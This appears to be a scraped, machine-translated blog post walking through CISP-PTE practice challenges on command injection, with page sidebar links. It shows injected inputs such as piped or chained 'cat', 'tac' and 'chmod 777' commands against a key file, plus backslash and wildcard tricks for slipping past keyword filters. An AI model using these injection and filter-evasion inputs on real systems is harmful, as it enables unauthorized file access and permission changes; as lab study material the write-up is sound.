当前位置:网站首页>2022 cisp-pte (III) command execution
2022 cisp-pte (III) command execution
2022-07-03 06:23:00 【A τθ】
One 、 The first
1、 Topic environment


2、 take key
2.1、 Get directory
127.0.0.1 | ls


127.0.0.1 | ls ../

2.2、 Read the file
Common command execution functions :
system("ls");
eval、exec
linux Reading documents : cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
If the key.php Do the filter :
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php


127.0.0.1 | t\ac ../key.php

The second way
1、 Topic environment


2、 The problem solving steps
2.1 Get directory

2.2 Increase authority
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*



2.3 obtain key
127.0.0.1 & t\ac ../key.*

3、 ... and 、 The third way
1、 Topic environment

2、 The problem solving steps

The fourth way
1、 Topic environment

2、 The problem solving steps
2.1、ls

2.2、 obtain key
http://81.70.245.6:50289?c=cat flag.php;


边栏推荐
- In depth learning
- 【无标题】5 自用历程
- Read blog type data from mysql, Chinese garbled code - solved
- GPS坐标转百度地图坐标的方法
- Simple understanding of ThreadLocal
- CKA certification notes - CKA certification experience post
- 剖析虚幻渲染体系(16)- 图形驱动的秘密
- ssh链接远程服务器 及 远程图形化界面的本地显示
- 2022 CISP-PTE(三)命令执行
- Migrate data from Amazon aurora to tidb
猜你喜欢

IE browser flash back, automatically open edge browser

Es remote cluster configuration and cross cluster search

Kubernetes notes (VI) kubernetes storage

Advanced technology management - do you know the whole picture of growth?

23 design models

ssh链接远程服务器 及 远程图形化界面的本地显示

轻松上手Fluentd,结合 Rainbond 插件市场,日志收集更快捷

ROS+Pytorch的联合使用示例(语义分割)
![[set theory] relational closure (relational closure solution | relational graph closure | relational matrix closure | closure operation and relational properties | closure compound operation)](/img/a4/00aca72b268f77fe4fb24ac06289f5.jpg)
[set theory] relational closure (relational closure solution | relational graph closure | relational matrix closure | closure operation and relational properties | closure compound operation)

YOLOV2学习与总结
随机推荐
Page text acquisition
conda和pip的区别
輕松上手Fluentd,結合 Rainbond 插件市場,日志收集更快捷
【无标题】8 简易版通讯录
认识弹性盒子flex
PMP笔记记录
Paper notes vsalm literature review "a comprehensive survey of visual slam algorithms"
Characteristics and isolation level of database
Simple understanding of ThreadLocal
Project summary --04
Oauth2.0 - Introduction and use and explanation of authorization code mode
Cesium entity(entities) 实体删除方法
Kubernetes notes (I) kubernetes cluster architecture
Numerical method for solving optimal control problem (I) -- gradient method
代码管理工具
arcgis创建postgre企业级数据库
ruoyi接口权限校验
Kubesphere - set up redis cluster
Cesium Click to obtain the longitude and latitude elevation coordinates (3D coordinates) of the model surface
Merge and migrate data from small data volume, sub database and sub table Mysql to tidb